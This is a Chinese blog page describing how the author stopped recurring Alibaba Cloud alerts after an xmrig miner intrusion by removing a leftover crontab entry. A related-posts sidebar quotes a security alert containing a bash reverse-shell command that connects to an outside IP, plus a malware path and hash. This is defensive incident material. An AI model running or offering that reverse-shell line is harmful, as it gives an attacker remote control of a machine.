阿里云:进程异常行为报警处理

最新推荐文章于 2022-05-20 21:53:45 发布
最新推荐文章于 2022-05-20 21:53:45 发布
阅读量1.5k 收藏
点赞数
文章标签: 阿里云 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hedabaobao/article/details/112214634
版权

最近阿里云服务器被xmrig挖矿程序入侵confluence,处理掉挖矿脚本和进程后,每天都还是收到阿里云的安全报警信息。
在这里插入图片描述通过PS -A命令发现
在这里插入图片描述在这里插入图片描述
462为crond定时任务,到/var/spool/cron/路径下发现有2个定时任务配置,打开vi confluence文件发现还残存挖矿程序启动命令(被启动的脚本虽然已经删除,但这个任务仍然会被定时调用,一直收到阿里云报警)。
在这里插入图片描述删除confluence内的内容,报警搞定。

Coding_Mario
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
云服务显示服务器异常,云服务器显示异常登录
weixin_39632212的博客
08-06 1386
云服务器显示异常登录 内容精选换一换云服务器列表页面,云服务器的状态显示为“异常”。进入云服务器列表页面,鼠标移动至“异常”状态处,查看具体的异常原因。查看异常原因根据查看的异常原因,匹配表1中对应的解决方案,解决云服务器异常。云服务器异常原因及解决方案异常原因解决方案第三方插件未运行重启云服务器音频设备未运行设置音频设备初始化会话失败重启云服务器自动化脚本执行失败重启云服登录GPU云服务器,Cl...
阿里云:城市大脑综合解决方案
03-31
1. 强大的数据处理能力:依托阿里云强大的计算资源,城市大脑能实时处理海量数据,进行快速分析和洞察。 2. 人工智能算法:利用机器学习和深度学习技术,城市大脑能自我学习和优化,不断提高预测和决策的准确性。 ...
恶意进程(云查杀)-DDOS木马
weixin_43200106的博客
06-10 3519
一、 恶意文件路径:/lib/libsys 恶意文件md5:90f06c70846f5570a32bc51a194a72c0 描述:黑客在入侵系统后植入的恶意程序,会占用您的带宽攻击其他服务器,同时可能影响自身业务的正常运行,危害较大。 此类恶意程序可能还存在自删除行为,或伪装成系统程序以躲避检测。如果发现该文件不存在,请检查是否存在可疑进程、定时任务或启动项。帮助文档:https://he...
阿里云错误:进程异常行为-Linux异常文件下载
weixin_34124651的博客
04-09 368
2019独角兽企业重金招聘Python工程师标准>>> ...
阿里云服务器报警-进程异常行为-访问恶意下载源
古天乐本乐的博客
08-20 1787
分享一个自己关于阿里云服务器告警的解决方法
阿里云自变异病毒处理-clamav
ba_pi的博客
07-14 770
阿里云自变异病毒处理 前几天因为yapi的一个漏洞,导致服务器遭受攻击。说一下处理流程。 1.通过top查找占用cup和内存高的可疑程序。 2.通过进程号找到按照目录,删除文件,停用程序。 一开始我就是这么干的,没过多久,阿里云报了一个自变异病毒,我准备去查询进程号,使用netstat,ps,lsof命令我发现不对劲了,没有任何反应 登录到服务器查询/bin目录,文件大小不对,可以明确感染文件不止一处,所以需要通过软件进行全盘扫描。linux下比较常见的杀毒工具是clamav,于是决定安装扫描全盘。 二、安
进程异常行为-反弹Shell攻击,KILL多个进程
weixin_34198797的博客
06-28 462
进程异常行为-反弹Shell攻击 父进程名称:bash 进程名称:bash 进程名称:/usr/bin/bash 进程id:23,077 命令行参数:sh -c /bin/bash -i >& /dev/tcp/27.255.72.119/4451 0>&1 说明:黑客利用远程代码执行漏洞或者恶意木马向中控服务器建立反向TCP连接,连接建立后,黑客可利用该连...
AliossUploader:layui 阿里云OSS上传插件
最新发布
06-09
- 使用阿里云提供的图片处理服务(ImageService)进行上传后的图片处理,如缩放、裁剪等。 - 可以根据业务需求自定义上传界面样式和交互逻辑。 7. **总结** AliossUploader为layui用户提供了方便快捷的阿里云OSS...
阿里云实验录屏:使用OSS对图片进行基本处理
08-23
阿里云实验录屏:使用OSS对图片进行基本处理
阿里云:NoSQL、RDS和大数据 异构融合实例分享
04-22
阿里云在IT行业中扮演着重要的角色,特别是在数据库和大数据处理领域。本次的“阿里云:NoSQL、RDS和大数据 异构融合实例分享”深入探讨了如何将三种不同的数据管理技术——NoSQL、关系型数据库服务(RDS)与大数据...
阿里云缺失字体文件导致乱码问题处理
07-15
在使用阿里云ECS(Elastic Compute Service)服务时,可能会遇到一些意想不到的问题,其中之一就是文本或图片显示出现乱码。这种情况通常是由于服务器缺少必要的字体文件导致的。本篇文章将详细探讨这一问题,并提供...
阿里云提示服务器进程异常行为-访问恶意下载源
没有解答思路的博客
12-22 3963
最近公司的服务器(阿里云)一直给老板发信息说,服务器在访问恶意下载源。老板一开始没在意,后来一天一条短信,然后让我处理一下。作为一个后端工程师,普通的服务器维护在小公司基本都是自己上手来。废话太多了,下面具体描述一下我遇到问题的和解决方法,以便大家遇到了之后不知所措。(大佬们,不吝指教~) 一。问题描述 阿里云服务器警告截图: 阿里云提示服务器访问恶意下载源(****.init.sh) 看这种警告...
linux bash进程异常,linux – 检查从同一bash脚本启动的后台进程的运行状态
weixin_42494796的博客
04-28 306
我必须编写一个bash脚本,根据传递的命令行参数在后台启动进程,如果成功运行启动程序则返回.这是我想要实现的伪代码if [ "$1" = "PROG_1" ] ; then./launchProg1 &if [ isLaunchSuccess ] ; thenecho "Success"elseecho "Failed"exit 1fielif [ "$1" = "PROG_2" ] ; ...
阿里云被攻击的处理方法
xyyaq的博客
04-01 5072
现在云服务器非常普遍,当下最多用到的就是阿里云、华为云、腾讯云等云服务器 但是如果我们在使用服务器的过程当中碰到黑客的DDOS攻击,我们应当怎么处理呢? 下面就以阿里云被攻击为例子给大家举例: 当我们的阿里云服务器受到攻击的时候我们的绑定手机会收到短信 当我们收到这个短信的时候,如果是第一次碰到难免心里会惊慌失措,但是大家不要着急,因为在很多时候我们的云服务器本身只有默认5G的防护值,很容易就超过防护阈值,导致我们的业务宕机,一旦业务宕机直接影响到的就是我们的团队以及市场运营,所以怎么样去解
记一次阿里云linux服务器中毒处理
九韭酒的博客
11-18 2025
记一次阿里云linux服务器中毒处理事件定位进程人肉筛查clamav来源参考 事件 阿里云告警: 您的云服务器(XXXXX)由于被检测到对外攻击,已阻断该服务器对其它服务器端口(XXX)的访问,阻断预计将在XXXXXX时间内结束,请及时进行安全自查。 登录服务器(Ubuntu 16.04.4 LTS),发现CPU满载,docker下的jekins各种重启。 定位进程 top命令,发现CPU占用...
SPF PermError: Too Many DNS Lookups - 当 SPF 记录超过 10 次 DNS 查询极限
hifall的博客
05-20 599
“SPF PermError: too many DNS lookups” 是一个在很多 SPF (Sender Policy Framework,发送者策略框架) 实现中常见的错误。当超过这个 10 次 DNS 查询的极限以后,SPF PermError,即 SPF 永久性错误,将被返回。SPF PermError 会降低邮件送达率。 本文介绍什么是 SPF 的 DNS 查找极限,当 SPF 记录越过这个极限的后果,以及如何使用 DMARCLY 的 Safe SPF 功能来解决这个问题。 SPF Perm
阿里云服务器被挖矿程序minerd入侵的终极解决办法
热门推荐
Java高知社区
01-06 4万+
突然发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了200%多的CPU, 百度了一下,查到几篇文章都有人遇到同样问题,解决的办法:http://blog.csdn.net/hu_wen/article/details/51908597 但我去查看启动的服务,尽然没有 lady 这个服务。 找不到根源,那个minerd进程删掉就又起来了,后来想了个临时办法,先停掉
邮件服务器端(MTA)错误代码解释
weixin_33911824的博客
09-01 2081
--邮件服务器端(MTA)错误代码解释 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值